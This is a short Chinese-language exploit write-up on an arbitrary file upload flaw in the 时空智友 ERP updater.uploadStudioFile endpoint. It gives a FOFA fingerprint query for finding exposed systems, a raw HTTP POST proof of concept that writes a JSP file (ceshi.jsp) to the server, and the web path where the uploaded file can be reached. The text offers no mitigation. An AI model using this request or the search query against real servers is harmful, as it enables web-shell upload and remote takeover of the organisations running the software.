## 时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞 时空智友ERP updater.uploadStudioFile接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。 ## fofa ``` body="login.jsp?login=null" ``` ## poc ``` POST /formservice?service=updater.uploadStudioFile HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Length: 1098 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Connection: close content=ceshi.jsp./1721970-01-01%2008:00:00 ``` ![image-20240626214852120](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262148311.png) 文件路径`http://127.0.0.1/update/temp/studio/ceshi.jsp` ![image-20240626215002638](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262150767.png)